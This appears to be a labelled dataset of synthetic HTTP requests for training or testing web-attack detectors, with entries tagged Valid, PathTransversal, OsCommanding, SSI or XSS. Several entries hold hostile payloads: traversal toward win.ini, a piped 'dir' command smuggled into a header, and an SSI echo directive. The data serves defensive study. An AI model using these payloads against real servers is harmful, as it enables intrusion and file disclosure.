TE: deflate;q=0.1
Trailer: Accept-Encoding
User-Agent: Mozilla/6.5 (Windows; U; Windows NT 4.2; Hp-oe; rv:0.0.9) Gecko/00977877
UA-CPU: Sparc
UA-Disp: 8420,749,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 175x9558
Via: 4.2 83.11.180.95:7694, 1.1 208.58.116.179, 5.5 www.eougxye.jpeg:03
Transfer-Encoding: deflate
Upgrade: 3mbtt/4.9, e4asi/7.0
Warning: 629 www.ecbma.htm "smrFi67hp6Oamp" 
X-Forwarded-For: 231.138.207.226
X-Serial-Number: 82459741903687
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15254
Start - Id: 8788
class: Valid
GET /s@8B2g0OAlae3Fdp@vt.shtml?3rNisgina=12979643&dcaFoF9xz=584046&9Etdaeba9anRtuo=893482&0z6P5m8JYAoL=dG&oin=lor31le&8u3hy=y%28Sg&aoaem=chlink&xexAcSw=eia5r5&tnberAdioryoer=sudd%3Cqj6x%5Chwp-b&z2lbhiro8isrww=hqeBi&6sOaflhnewEcsi=oueeEelq&rtTaeiwlhyi=kb008&lsnthr1pv=dINb&mtye=pt8tdZi7ot3e5sLnl&aiootdii7ie=%2BYyAsZlsnt+e%2Bsjfa HTTP/1.0
Host: 183.205.124.119:80
Connection: 4J2ssk
Accept: */*
Accept-Charset: cp-950
Accept-Encoding: compress;q=0.4, compress;q=0.0, gzip
Accept-Language: xs-oinA, znaaame-4Ta6tjrs, 79ejiiys-zmN30a, i1s7di-fSSl;q=0.7
Cache-Control: no-transform
Client-ip: 89.54.65.121
Cookie: TtpasswdpositionPt3=e;3fMj=puh ;ysuuNOlss=n@;ct1sL6Tdee=80
Cookie2: $Version="3"
Date: Tue, 23 May 06 07:26:07 UTC
ETag: "fce7_Rvgq32my2N"
Expect: dasbtnzi
From: nq5rma@oelceseNaa.org
If-Modified-Since: Tue, 14 Mar 06 14:08:04 GMT
If-Unmodified-Since: Sat, 24 Feb 07 13:52:56 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 19 Jan 08 09:08:00 GMT
Max-Forwards: 876
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: Basic aXRzaWU6ZGxlZA==
Authorization: eFhgea jaeGP=6iSeni
Range: 348876-,-8,27-
Referer: /ssbrn/4jme/Refrolmw.txt
TE: chunked,deflate;q=0.0
Trailer: Accept
User-Agent: dbil9aee/1.8.6
UA-CPU: 68000
UA-Disp: 347,7346,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 817x9608
Via: HTTP/1.5 www.Yuui.jpg:5, 0.8 36.241.122.120, HTTP/4.9 92.115.146.118
Transfer-Encoding: compress
Upgrade: dckw/9.9, i68c/0.2, anoub/4.9, 3tidh/6.1
Warning: 295 www.nais.htm "ioTseniTrnsie" 
X-Forwarded-For: 71.221.125.93
X-Serial-Number: 28573562
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8788
Start - Id: 45529
class: PathTransversal
GET /6g/group byetcQ9logXdYfVlJJp/-bin@6and0bodyIZf/eGx24vw0Rb/t8c.skRbAh/dh2pSYsiNgy.@x_aj.shtml?olnti=sa&scpsz=e&bodyaGrRO2Ysexec=r5eihash2un&ect5o0Oepn7dtz=%257hdheshudtogtgp&9onfreatrb=icmd%27ent&eEi=on&merM3bsombtp=tHstyle+T2dqah%27Ea&krchildkDTfsock_stream=ii3qC3O7&GOa=%5D&e3Idx=e%3A%5C%5CWINNT%5C%5Cwin.ini HTTP/1.1
Host: www.d1Emii.be:11853
Connection: yqehgn
Accept: */*;q=0.5
Accept-Charset: macintosh
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 228.114.110.173
Cookie: aeutest=omVT2;zsll=ilfBe;as8GaOulntashe=IB uc
Cookie2: $Version="02"
Date: Fri, 16 Sep 05 23:17:20 GMT
ETag: "av.vRdQd-D-3_g1eS-h"
Expect: 100-continue
From: aFhd@iesknmut3c.net
If-Modified-Since: Thu, 07 Jun 07 02:32:40 UTC
If-Unmodified-Since: Fri, 10 Oct 08 03:40:36 CET
If-Match: "QO7mUYF7KF7JrlwdRBK"
If-None-Match: *
If-Range: "o-RPy4fdvX7UrgA3X"
Max-Forwards: 4111
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic cnV0YWxqZU46N3RtZW4=
Range: 903-3,3-4324,-8
Referer: /sjtedbe.html
TE: trailers,trailers,trailers
Trailer: Accept
User-Agent: Mozilla/2.4 (compatible; Konqueror/4.1; Win 9x; YHOrhgc7; rymls)
UA-CPU: 68000
UA-Disp: 3482,2872,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 441x867
Via: HTTP/3.1 139.69.148.31
Transfer-Encoding: compress
Upgrade: vleih/1.8, zzq/8.8, etwstn/4.5, eseo/9.8, ilezr/6.6
Warning: 291 197.115.20.32 "ofotvtereustbtDpofo" 
X-Forwarded-For: 55.26.191.205
X-Serial-Number: 2215888867609
----: ------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 45529
Start - Id: 42803
class: OsCommanding
GET /HAqf4xr/oSEvSWuWPHjFRVR/VKlPRs_38lcni/ibKHRhObLECnA/xP/.Gg/d4lMfN/eyaAeol/fe4G9@tJiRAxI/nja1aeY31ltte1tpeuo/nkiHTTuQz3zdK0CZf_D.tiff?SetbeeAuenoae=niitD&3v=tuoor0Z8&xFY0y=r8tj73nb7WSs&eutnh5a=pyjoqnndp9&Enoutullhau=ee2n&ee1iDr=52382&n6B9Aor=9s&nn05=312&ar4uemiltsqug=%3E0urfoanullrcprte%5Dt-&Onie91thtro=otd9-&mrI=k_3F0.5&tinoentqy=tgni&hmdcbao=88&HKlstenS86vEh9=td5sbuenuitw2tthd&gil0ienlot=8depgue17 HTTP/1.1
Host: www.oitibes.gov:97778
Connection: TtIjgst
Accept: application/*, video/*;q=0.6, video/mpeg
Accept-Charset: iso-8859-9;q=0.9, windows-1253;q=0.6, koi8-r, iso-8859-1;q=0.2
Accept-Encoding: *
Accept-Language: |     dir     ..\\..\\..\\..\\..\\..\\..\\ ,
Cache-Control: no-transform
Client-ip: 64.29.204.60
Cookie: etlsTa02=34282643;aosacieeeEIalP=aznkioe8o0be;88anal=128577926
Cookie2: $Version="869"
Date: Mon, 11 Jul 05 14:36:41 CET
ETag: "NPJV0U7C3eXIWfmDdtDy"
If-Unmodified-Since: Mon, 30 Jun 08 07:07:35 GMT
If-Match: "SnooOTCXE3NMz@_f"
If-None-Match: "Ghzz_Aw5p0pEDjS13"
If-Range: Sun, 07 Dec 08 22:30:55 GMT
Max-Forwards: 65
Pragma: no-cache
Proxy-Authorization: Basic ZTRFczp1Z290ZTVl
Authorization: NTLM bXNub25laWFoaDF0MXhTZDU3cm50bXNydzJudXE1cWRlZW5hZWVz
Referer: /pTnsem/uijtca/qsvsBoee/en5e/DnIhnei.php
TE: chunked;q=0.0,trailers
Trailer: If-None-Match
User-Agent: Mozilla/1.4 (Machintosh; U; Mac OS X 9.5; ru-oo; rv:9.3.5) Gecko/24779419
UA-Disp: 017,6787,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 4444x6444
Via: 4.4 213.130.0.148
Transfer-Encoding: iSty
Warning: 125 4.115.200.34:8 "aapi" 

null

End - Id: 42803
Start - Id: 39220
class: SSI
GET /mz/locationn/fPkupWQKyUBO1Ba5@JRK/n67ZxMZ_crg/ah5q/LbodyQfbL7k8/FN/AphpyWupdate7Bpboot.inidoptm-/1ieekc4esbixuih/ovd/e.Sx-/r67.js?gmC3Hi7t86as=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&@5sbodyNfWHSR=264&Sa0ww=2&sevKl=6heuF HTTP/1.0
Host: 172.251.113.250:8
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: max-stale
Client-ip: 139.182.4.92
Cookie: etme3oOesobs=2186618
Cookie2: $Version="748"
Date: Fri, 22 Jan 10 02:11:47 GMT
ETag: "stS0mrsBNpQBIdeOv"
Expect: 100-continue
From: eobt@sitnTmdv.ch
If-Modified-Since: Fri, 27 Oct 06 04:44:51 GMT
If-Unmodified-Since: Sat, 13 Jun 09 22:20:04 UTC
If-Match: "Bp_k@5tU4FWSHcmVId"
If-None-Match: "s0NKnvzCbUPI4@SZlRMG"
If-Range: Tue, 24 Jun 08 09:54:03 UTC
Max-Forwards: 6042
MIME-Version: 2.2
Pragma: no-cache
Authorization: tvfih toaier=t6einmm
Range: 5962-
Referer: http://www.Mdof.be/pctaaes.wav
TE: trailers,trailers
User-Agent: Mozilla/0.7 (compatible; etocoecihe; Linux i386; 0dya0nhPn; lNd7i8rir; pnhivI)
UA-Disp: 4572,5584,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 506x400
Via: HTTP/7.4 www.oact6.js, 7.8 www.famia.jpeg, HTTP/6.0 www.eKectRE.jpg:1
Transfer-Encoding: compress
Upgrade: etvee/9.3, tcp7s/3.5, trta/7.7, hrfcrn/6.4
Warning: 988 51.40.12.35 "rctnf7iObtnydwbkia" "Sat, 31 Dec 05 16:12:13 GMT"
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39220
Start - Id: 13747
class: Valid
GET /69hinteieeliolo8a/tfxm/sX.xpXuk@chWmj74h/s1_y2C8ZW/iPjTsYElHid2lrJpO.jpg?tBtl4=n8d&3qeotoosknhvth=ef%3En&ltoele7az=429698650&5idfemnnfee=141&ynosOueieau=agroup+byinputlcbn&_wWgQv.=ka&DV6a=e7yucrxrpHmemseee&8betweenB6eXA7Band=edgyr+mqe+nCja%7Cth&opcirsa16=03&rdEe=o%29dei&r0edlltdsljt=roofT-m9pa HTTP/1.1
Host: www.ttswkn3e.it
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.3, identity, compress
Accept-Language: o-dT;q=0.4, iztsfy-5aatun
Cache-Control: max-age=9126
Client-ip: 145.63.22.213
Cookie: Lttco=846;Fai4fabc0ahiked=ur;6sa=pscin;OKWUQkpdwhereC=4905;oyfeon7c=tHtPAf;shidEy=774486383
Cookie2: $Version="85"
Date: Mon, 04 Feb 08 21:58:01 UTC
ETag: "FxTdWi9J-MFVmjxcFGeq"
Expect: 100-continue
From: gnhB9o@rfci.com
If-Modified-Since: Mon, 16 Mar 09 03:45:31 CET
If-Unmodified-Since: Sat, 26 Mar 05 11:27:07 GMT
If-Match: "fDx7.Txtq7s6tFiw"
If-None-Match: "BfC0J-Z4xMWeJ_YZ"
If-Range: "YeAsL03Gk@jxZqQNfN"
Max-Forwards: 3148
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Digest nc=bCafdbFc
Authorization: IatDe xTagi4Sc=fistaxdu
Range: -876597,708-263,3085-
Referer: http://qzln.st/ksot/rWlCirg.php4
TE: trailers,trailers
Trailer: Cache-Control
User-Agent: Mozilla/6.0 (Windows; U; Windows NT 3.4; zi-ei; rv:2.0.1) Gecko/24349125
UA-CPU: PowerPC
UA-Disp: 173,9492,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 6985x6776
Via: 5.0 101.232.31.202, HTTP/6.8 251.111.146.109
Transfer-Encoding: deflate
Upgrade: l4tt/6.1, gtIh/6.6, nsetrs/8.9, h1ehro/2.2
Warning: 820 www.uproeo.htm "Ianeee" 
X-Forwarded-For: 60.68.206.39
X-Serial-Number: 6046766144734
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 13747
Start - Id: 3683
class: Valid
GET /aY_Vm8vHg.msf? HTTP/1.1
Host: www.daaane.st
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: uo-2kr;q=0.8, ten5to-nop, Nncg1A-Rnw13q, dk-ecby;q=0.7
Cache-Control: max-stale=8
Client-ip: 18.115.240.217
Cookie: mO=7m7LIc@aQcZ;et=e.dbE.-k2yC;geotgomssma=btbciatEedng;i0A=i6
Cookie2: $Version="66"
Date: Fri, 26 Aug 05 12:17:48 UTC
ETag: W/"tYocNHVY96Z_wzgnl"
From: msqr@3sAneh.gov
If-Modified-Since: Sat, 24 Jul 04 17:16:04 GMT
If-Unmodified-Since: Sat, 06 Feb 10 02:25:51 UTC
If-Match: *
If-None-Match: "42cKsOV71kGqeRAeECu"
If-Range: "Lc96-GililHkMv.VyZMe"
Max-Forwards: 07
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: 2nsn hBbdTAE=enci
Authorization: Digest qop=auth-int
Referer: /pOm5/aaje/8zpbnox/tcT8s80/ruIt.aspx
TE: gzip;q=0.3
Trailer: Accept-Language
User-Agent: sfC5Yr7. http://www.adfAe.com
UA-Disp: 7385,2023,32
UA-OS: Mac OS X
Via: 5.4 214.241.104.98, 8.9 www.lde9zRn.tiff
Transfer-Encoding: gzip
Upgrade: oem/9.0
Warning: 596 196.3.90.63 "Vaseasglsao" "Sun, 09 Apr 06 09:50:54 GMT"
X-Forwarded-For: 173.37.128.252
----: --------------------

null

End - Id: 3683
Start - Id: 13679
class: Valid
GET /rvenobed9epgtait/NEreaaemhwleecosMa62/tQWP/G3.lv80RUk@@xd/8keo8r.C6EOqm1FPgxM.js? HTTP/1.0
Host: www.apnluhuw.gov:1091
Connection: close
Accept: application/x-tar;q=0.1, image/*;q=0.6
Accept-Charset: iso-8859-9, macintosh;q=0.5
Accept-Encoding: *
Accept-Language: Ats8dEaa-kgbl81;q=0.8, otCyn9i-rem7annM, Hjzreina-tPnvp;q=0.4, siEwru-wfse
Cache-Control: no-cache
Client-ip: 106.218.100.226
Cookie: sa=nph-htaccesi];;6btphpEx=831
Cookie2: $Version="4"
Date: Wed, 21 Feb 07 08:15:47 UTC
ETag: W/"7AUnbysWX_rJRTe_V1PF"
Expect: eantnc
From: oo7g4l@pAu9fultst.biz
If-Modified-Since: Sun, 17 Feb 08 18:23:10 CET
If-Unmodified-Since: Sat, 07 Jun 08 11:39:15 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3051
MIME-Version: 4.7
Pragma: eaIici=rsr
Proxy-Authorization: Basic c251dXl0OmdoempzdQ==
Authorization: said eIuSoy2=azt0mlL
Range: -8048,0060-,874395-654763
Referer: /tfwe/zSrf6/in76nrfm.asmx
TE: trailers,trailers
Trailer: Pragma
User-Agent: nFaDI.zvg4 http://www.nodsna.uk
UA-CPU: PowerPC
UA-Disp: 2040,5971,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 947x489
Via: 0.1 247.87.172.238:280, denr/0.5 157.142.38.93
Transfer-Encoding: identity
Upgrade: baeo/5.7, Bstoo/9.6, enOenJ/0.8, Tmce/5.1
Warning: 810 233.40.240.2:75910 "hppilonufanrr5o" "Tue, 05 Oct 04 06:33:59 UTC"
X-Forwarded-For: 145.31.187.12
X-Serial-Number: 02500062912801761
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 13679
Start - Id: 2411
class: Valid
GET /m-_j2nN9c40/Hj0netcat/nauRrfYjqGbkhH/1TDahmi6u.php3?Esemmxi=%29rexec4%3F%5Dou%29x%3Cnwr&childMmRGHM-akL=0064&RAZxSO=s03i&nrwjn5stialoje=a5L1y&ieS=2997292&serrNogqtduo=hpKnAclntl&oqY-4XperldBX=7033511 HTTP/1.1
Host: 31.22.241.107
Connection: ec0nroc
Accept: audio/*;q=0.8
Accept-Charset: *;q=0.1
Accept-Encoding: deflate, identity, gzip, compress;q=0.0
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 168.90.123.51
Cookie: mttefr=mctothy9r4fascc;selp=bQU4H4s4@za;Bsueg=711381
Cookie2: $Version="1"
Date: Sun, 19 Mar 06 02:06:58 CET
ETag: W/"h6BO4lSOeHIukUAXMVV"
Expect: mnmhdgus
From: 0talRina@qieneot.fr
If-Modified-Since: Thu, 03 Jul 08 21:28:05 UTC
If-Unmodified-Since: Sat, 09 Oct 04 14:55:04 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 27 Nov 05 10:50:14 GMT
Max-Forwards: 0
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Digest response="32CC03ccCD2C4F02bb800C8DE1CCEbDB"
Authorization: NTLM aDNsbmhPYW5wYmF0cmNuZWZhZW50c2FkcHRrZXliMndp
Range: 69893-,12785-855,77-
Referer: /EtisiA.txt
TE: chunked
Trailer: User-Agent
User-Agent: Mozilla/4.0 (X11; U; Open BSD i386 0.2; vh-sl; rv:8.0.0) Gecko/86600365
UA-CPU: MIPS
UA-Disp: 5566,8703,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 4150x3363
Via: sse/5.6 www.5nqat.png
Transfer-Encoding: deflate
Upgrade: hikle/8.3, vhr/8.6, eWn/8.8, T5wt/3.1
Warning: 068 135.230.35.43 "qrbou" "Thu, 23 Mar 06 24:58:53 GMT"
X-Forwarded-For: 213.191.153.150
X-Serial-Number: 222850324123398
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 2411
Start - Id: 34506
class: Valid
PUT /aosae5/yo7dro6bne/y.M4Pecho.NzvA.QOr/wM4EZqMs-hQyzz5i3mL-/rrOco/n_nD-xDRUpHu9/el3lN3TaXkd/tiI4DA_dg5k7wDVZkO./asIi2si.swf? HTTP/1.0
Content-Length: 70
Content-Language: shn,entzDuh6
Content-Encoding: compress
Content-Location: http://et7eD.biz/ttPs/lgiqd/nennbri/eoyn/yrdih.msf
Content-MD5: QXMydGhpcXp5ZXN0aDE3Yg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 07 Feb 08 17:03:52 CET
Last-Modified: Wed, 03 Jun 09 13:19:58 UTC
Host: 227.50.243.52
Connection: close
Accept: */*;q=0.5
Accept-Charset: gb2312, hz-gb-2312, iso-8859-5
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: max-stale=2895
Client-ip: 96.49.197.35
Cookie: 6tcT8x=oG.
Cookie2: $Version="082"
Date: Sun, 11 Jun 06 22:13:15 GMT
ETag: W/"zXkqap1UykJ3qZ_m7Y"
Expect: cdtl=esmhnnau;yyg0oN3=nromuy
From: doesa@0psfre.gov
If-Modified-Since: Thu, 29 Jan 09 01:37:39 CET
If-Unmodified-Since: Sun, 25 Nov 07 21:24:17 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 26 May 08 08:23:33 CET
Max-Forwards: 04
MIME-Version: 1.0
Pragma: eNh=dUino
Proxy-Authorization: Basic b21laDd0Omhoa28=
Authorization: Digest uri=http://www.lpcara8t.gov/eetwTrid/tte6tii3/fldefi.aspx
Range: -10,976-,-186
Referer: http://fepuvdmg.gov/rEeh8/evrda/E6taiims/5essna.gz
TE: chunked
Trailer: Upgrade
User-Agent: Mozilla/5.4 (compatible; MSIE 7.4; Open BSD i586; 4olnpa4tH; rnTC)
UA-CPU: MIPS
UA-Disp: 3627,6324,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 7089x0052
Via: 0.8 118.166.57.117:99, 6.2 www.n8couee.js, n0mZ/3.4 148.17.231.110
Transfer-Encoding: deflate
Upgrade: ow0/6.1, 5hBE/0.7
Warning: 499 24.172.147.164 "idoo6ex7lm" "Fri, 25 Mar 05 19:19:41 CET"
X-Forwarded-For: 94.124.42.230
X-Serial-Number: 16107825761
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

y1lXHVxQ-4rJ=03346&Qy4IhLo=a &ra6=reb1iwpc87zseer8ce&ynseere1ce=fliesi

End - Id: 34506
Start - Id: 17847
class: Valid
GET /apChpef7n/kYX02t8B61/iNp.php? HTTP/1.0
Host: www.mdlwohn.uk
Connection: euEsho
Accept: application/x-tar, image/*;q=0.0
Accept-Charset: x-mac-chinesesimp
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: aur='e'
Client-ip: 230.33.225.198
Cookie: 6YselectL-xVs_lw=b;x4mj4w8=o;1eivt9H6enooi=190966;deleteNRmsystemM7metaFkN=ascripti3;pa8.=ac
Cookie2: $Version="503"
Date: Fri, 04 Jun 04 17:08:58 UTC
ETag: "6iCjJLRY-a6HuJ-"
Expect: 100-continue
From: lrnihbje@e0fdWo.be
If-Modified-Since: Thu, 06 Apr 06 10:43:53 CET
If-Unmodified-Since: Mon, 24 Sep 07 20:03:41 GMT
If-Match: "Gg@tbkqzOjXknJ4"
If-None-Match: *
If-Range: Mon, 05 Apr 04 16:04:49 UTC
Max-Forwards: 812
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest uri=/cied43/n2tr/gSdoo5nw.php3
Range: 5-3
Referer: /nosus/h6dbttre/ss32yani/nh5rgf/asrllh.conf
TE: trailers,gzip,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/3.9 (Machintosh; U; Mac OS X 4.0; Pt-mi; rv:3.9.8) Gecko/07804070
UA-CPU: 68000
UA-Disp: 8443,978,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 3160x969
Via: 5.6 237.206.238.111:89, HTTP/5.7 62.26.83.78, 2l5ihb/6.8 177.54.11.252
Transfer-Encoding: hkak; iokoeor=lrdque
Upgrade: Meee/4.6, nrwisN/0.0, 0Idlt/2.9, iknhr/5.4
Warning: 251 www.imAynCn2.html:1876 "wyu5ls5teb2nziefeO" 
X-Forwarded-For: 65.146.203.44
X-Serial-Number: 164483377111827
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 17847
Start - Id: 20967
class: Valid
GET /iJS.mNIonfDL5jT/rImMb/lkoABi@EoY0Ke.jpg?ersikttR=e-WAvUH&HRE4sApI=baxp_r&ffr6s=msyda&Nrudut=huEub&mnrPRaalrm=055&epgrrlew7l=EdE+ltyrpsehilspt%7C&tdeSontv5iomf=tt HTTP/1.1
Host: 192.160.14.60:4693
Connection: close
Accept: */*;q=0.6
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: io-pv
Cache-Control: no-cache
Client-ip: 8.17.126.237
Cookie: aUfx=02479103;acl7mtEaiza=ho0ar@;kpnl6ee=33;A.V4iHVrc=iq2opn0neu9dl2 a
Cookie2: $Version="77"
Date: Fri, 22 Feb 08 09:59:51 UTC
ETag: "qqN7vbO8vipJnKcme"
Expect: yhhsseB=toxiEqex
From: stnsist@ee8nh.de
If-Modified-Since: Sun, 03 May 09 20:10:05 UTC
If-Unmodified-Since: Fri, 22 Feb 08 16:38:50 GMT
If-Match: "SRW0BdiOSFyaWhSxmq1"
If-None-Match: *
If-Range: *
Max-Forwards: 77
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Digest uri=http://trntegwe.gov/aaae/hicet/u5e6b.aspx
Authorization: Digest cnonce="rr0s7e"
Range: 225798-,299422-
Referer: http://suet6.gov/ne7ws.cgi
TE: trailers,chunked;q=0.3
Trailer: Authorization
User-Agent: ire10g/1.4
UA-CPU: 68000
UA-Disp: 3276,4561,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 212x4647
Via: 6.6 www.coui.css, 2.0 www.neoyh.html:54
Transfer-Encoding: compress
Upgrade: tknsdI/6.1, bao9sk/7.3, wfso/2.7, lrm/1.0
Warning: 818 39.101.24.238 "Ei4etc3nfbsi2nwj" 
X-Forwarded-For: 65.200.228.238
X-Serial-Number: 70412595449023727026
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20967
Start - Id: 2027
class: Valid
GET /tqf/9TgiyfOpG7Mpdyq55y/iLfs57n8eC2hpy/hH5F8Dg1sock_streamt4j_Y/e1Kf4lXrfFqPA-0/i4UZgh.zGttuB8F3Nm/eLxlgHbxrtvw-KoFwK9E/hcttcolh6aras9.js? HTTP/1.1
Host: 236.67.75.26
Connection: htintNoa
Accept: application/zip
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: lo4d-melexEet;q=0.4
Cache-Control: min-fresh=125
Client-ip: 160.114.220.230
Cookie: iws=ifiecfs;x6=rli2;osrtmvrt=1260;7lO5zk=nperl5y
Cookie2: $Version="1"
Date: Thu, 05 Feb 09 13:40:12 CET
ETag: "T4XTwTByjGJ.o3SaEQU0"
Expect: 100-continue
From: lasmg@tytlcyu.de
If-Modified-Since: Tue, 05 May 09 13:05:45 CET
If-Unmodified-Since: Thu, 13 Sep 07 05:04:15 UTC
If-Match: *
If-None-Match: *
If-Range: "N3iIr49iSccWWZo"
Max-Forwards: 2
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: hn5ri hitrai8=tiph1etc
Authorization: Digest opaque="nesch"
Range: 705982-,79-08776,-104383
Referer: http://aesuil.be/ymbeoeoe/yaolje/hfarr/tfdo/dnAuri.gz
TE: chunked;q=0.6
Trailer: Upgrade
User-Agent: Mozilla/1.2 (X11; U; Linux i586 2.3; ov-c3; rv:5.2.0) Gecko/69714492
UA-CPU: 68000
UA-Disp: 5129,6449,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 8738x825
Via: FTP/2.9 www.iggr.png:89042
Transfer-Encoding: identity
Upgrade: een/2.2
Warning: 708 132.88.214.56:00119 "eafagnwnp6tlo" 
X-Forwarded-For: 129.8.72.4
X-Serial-Number: 71873
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2027
Start - Id: 30844
class: Valid
GET /FA0P0E/d@iUER48T1MGTx2/0ljBxGfperl/hPQJTEhAKmochaIBidwindow.open/w.l5lsMG.vX8UJak/IdwTahfhImw/raleeibcClc5ms/a1EulH/fn_M/wNldaesebA6hjheewde.exe?ebnnea=70160047&ogdruem=760316&as6thv=nior7&Otfaiews6a=%29ebo HTTP/1.0
Host: www.uqnhp.biz:80
Connection: close
Accept: */*
Accept-Charset: macintosh, euc-tw, cp-932, x-mac-hebrew;q=0.9, iso-2022-jp;q=0.3
Accept-Encoding: *
Accept-Language: toreSm-eo, Eego7e-b9n, nwocom-3lr4ix8, d-ntoUsnl, tm-jsiAoaZ;q=0.1
Cache-Control: max-stale
Client-ip: 24.144.229.61
Cookie: ncg=a'rso;cMeiehef=dralbpmloe
Cookie2: $Version="084"
Date: Thu, 17 Apr 08 15:44:14 GMT
ETag: "KjGB5E69B2JxQ1uJ"
Expect: 100-continue
From: yaesarka@shnuhndm.st
If-Modified-Since: Wed, 07 Jun 06 05:49:24 CET
If-Unmodified-Since: Mon, 16 Jun 08 12:45:48 CET
If-Match: "FO6hv_VE4ZYE.mf"
If-None-Match: "O9@i2c.dN1FVn9KQ"
If-Range: Mon, 26 Jul 04 19:46:05 GMT
Max-Forwards: 938
MIME-Version: 8.2
Pragma: 3azcn=dW
Proxy-Authorization: Digest uri=/e271e/dzed/xtIes/dtoh.tar
Authorization: tPci2 sorie=sufusor
Range: 0-9,-164,6789-
Referer: /eena4/ofoxa.txt
TE: gzip,trailers,deflate;q=0.5
Trailer: Connection
User-Agent: nurcihFh1tSo
UA-CPU: MIPS
UA-Disp: 072,6639,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 8282x452
Via: FTP/8.0 www.rehrs.js, 8.6 www.nL7s.html, 2.2 www.tauise.htm
Transfer-Encoding: essua
Upgrade: ean/4.5, snh/8.7, gs4/8.9, tms/1.8
Warning: 487 www.3aeuzssp.html "5daxrei" "Sat, 28 Apr 07 04:33:31 UTC"
X-Forwarded-For: 37.25.72.3
X-Serial-Number: 940026202382470481
----: ----------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 30844
Start - Id: 44005
class: OsCommanding
GET /scripts/georgi.asp/..��..��..��file.ext? HTTP/1.0
Host: www.yleeon.fr:80
Connection: hfaNnimw
Accept: audio/*;q=0.1, image/*;q=0.3
Accept-Charset: ks_c_5601-1987, windows-874, iso-2022-kr;q=0.0, ks_c_5601-1987;q=0.5
Accept-Encoding: gzip
Accept-Language: *
Cache-Control: no-transform
Client-ip: 89.252.55.156
Cookie: 1ewlrje=8ibbtftpayvsin t
Cookie2: $Version="3"
Date: Thu, 30 Mar 06 15:20:41 UTC
ETag: "WKKEhSDEdJpn_XZ.E"
Expect: inTns
From: 44fa@mshrPyo.gov
If-Modified-Since: Mon, 12 Jun 06 18:22:47 UTC
If-Unmodified-Since: Sun, 30 Jan 05 11:37:04 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 24 Oct 09 04:00:21 GMT
Max-Forwards: 3081
MIME-Version: 9.9
Pragma: i='64tnhai'
Proxy-Authorization: Digest opaque="ebymenp"
Authorization: ivn1d wIdh9ti=ee5z
Range: 67-764741,470518-20,3-202913
Referer: /8dnrtgeh/6htyXr.jpg
TE: trailers
Trailer: Host
User-Agent: Mozilla/6.2 (Machintosh; U; PPC Mac OS X 6.3; si-bS; rv:2.0.5) Gecko/91464360
UA-CPU: PowerPC
UA-Disp: 402,257,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 5667x180
Via: 3.9 www.bsiefi7.png, 7.6 www.aldsltE.tiff, FTP/4.6 90.6.139.221
Transfer-Encoding: deflate
Upgrade: rnr/0.5
Warning: 912 248.158.243.227:1807 "eareZo" 
X-Forwarded-For: 55.100.34.25
X-Serial-Number: 337660
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44005
Start - Id: 47894
class: XSS
